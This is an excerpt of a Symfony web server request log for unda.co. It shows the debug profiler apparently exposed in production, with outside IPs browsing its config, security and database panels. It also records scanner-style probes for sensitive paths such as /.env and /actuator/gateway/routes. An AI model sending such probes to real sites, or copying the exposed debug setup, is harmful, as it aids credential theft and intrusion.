  2126. [2025-12-17 06:55:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=twig","method":"GET"} []
  2127. [2025-12-17 06:55:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2128. [2025-12-17 07:00:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2129. [2025-12-17 07:02:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=time","method":"GET"} []
  2130. [2025-12-17 07:02:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2131. [2025-12-17 07:07:45] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2132. [2025-12-17 07:09:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=security","method":"GET"} []
  2133. [2025-12-17 07:09:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2134. [2025-12-17 07:11:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"75541a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/75541a?panel=events","method":"GET"} []
  2135. [2025-12-17 07:11:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  2136. [2025-12-17 07:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85","method":"GET"} []
  2137. [2025-12-17 07:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2138. [2025-12-17 07:18:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2139. [2025-12-17 07:20:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  2140. [2025-12-17 07:20:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2141. [2025-12-17 07:20:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2142. [2025-12-17 07:20:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /WuEL"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /WuEL\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2143. [2025-12-17 07:20:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /a"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /a\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2144. [2025-12-17 07:20:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /download/file.ext"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /download/file.ext\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2145. [2025-12-17 07:20:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SiteLoader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SiteLoader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2146. [2025-12-17 07:20:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mPlayer"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mPlayer\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2147. [2025-12-17 07:24:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=request","method":"GET"} []
  2148. [2025-12-17 07:24:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2149. [2025-12-17 07:32:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  2150. [2025-12-17 07:32:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  2151. [2025-12-17 07:32:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  2152. [2025-12-17 07:32:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  2153. [2025-12-17 07:32:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=config","method":"GET"} []
  2154. [2025-12-17 07:32:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2155. [2025-12-17 07:33:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b60b2a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b60b2a/search/results?ip=57.141.6.53&limit=10&method=GET","method":"GET"} []
  2156. [2025-12-17 07:33:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=57.141.6.53&limit=10&method=GET","method":"GET"} []
  2157. [2025-12-17 07:36:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00dd99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/00dd99?panel=validator","method":"GET"} []
  2158. [2025-12-17 07:36:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  2159. [2025-12-17 07:39:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=cache","method":"GET"} []
  2160. [2025-12-17 07:39:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2161. [2025-12-17 07:45:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de","method":"GET"} []
  2162. [2025-12-17 07:45:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  2163. [2025-12-17 07:48:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
  2164. [2025-12-17 07:48:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2165. [2025-12-17 07:51:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=twig","method":"GET"} []
  2166. [2025-12-17 07:51:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2167. [2025-12-17 07:57:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=time","method":"GET"} []
  2168. [2025-12-17 07:57:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2169. [2025-12-17 08:02:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=security","method":"GET"} []
  2170. [2025-12-17 08:02:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2171. [2025-12-17 08:08:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.82.11.99&limit=10","method":"GET"} []
  2172. [2025-12-17 08:08:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.82.11.99&limit=10","method":"GET"} []
  2173. [2025-12-17 08:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=request","method":"GET"} []
  2174. [2025-12-17 08:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2175. [2025-12-17 08:08:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=logger","method":"GET"} []
  2176. [2025-12-17 08:08:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  2177. [2025-12-17 08:13:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34983a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/34983a?panel=cache","method":"GET"} []
  2178. [2025-12-17 08:13:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2179. [2025-12-17 08:14:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=config","method":"GET"} []
  2180. [2025-12-17 08:14:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2181. [2025-12-17 08:21:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=cache","method":"GET"} []
  2182. [2025-12-17 08:21:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2183. [2025-12-17 08:22:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  2184. [2025-12-17 08:22:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  2185. [2025-12-17 08:23:10] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c11fb1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/c11fb1/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2186. [2025-12-17 08:23:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  2187. [2025-12-17 08:25:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2188. [2025-12-17 08:27:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234","method":"GET"} []
  2189. [2025-12-17 08:27:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2190. [2025-12-17 08:27:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
  2191. [2025-12-17 08:27:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
  2192. [2025-12-17 08:32:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2193. [2025-12-17 08:33:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=twig","method":"GET"} []
  2194. [2025-12-17 08:33:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2195. [2025-12-17 08:34:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2196. [2025-12-17 08:37:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2197. [2025-12-17 08:37:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"51838a","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/51838a","method":"GET"} []
  2198. [2025-12-17 08:39:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=cache","method":"GET"} []
  2199. [2025-12-17 08:39:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2200. [2025-12-17 08:43:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2201. [2025-12-17 08:43:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2202. [2025-12-17 08:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=twig","method":"GET"} []
  2203. [2025-12-17 08:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2204. [2025-12-17 08:52:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=time","method":"GET"} []
  2205. [2025-12-17 08:52:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2206. [2025-12-17 08:52:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2207. [2025-12-17 08:54:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2208. [2025-12-17 08:58:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=security","method":"GET"} []
  2209. [2025-12-17 08:58:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2210. [2025-12-17 09:00:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2211. [2025-12-17 09:04:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=request","method":"GET"} []
  2212. [2025-12-17 09:04:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2213. [2025-12-17 09:07:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
  2214. [2025-12-17 09:07:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  2215. [2025-12-17 09:09:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  2216. [2025-12-17 09:10:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=cache","method":"GET"} []
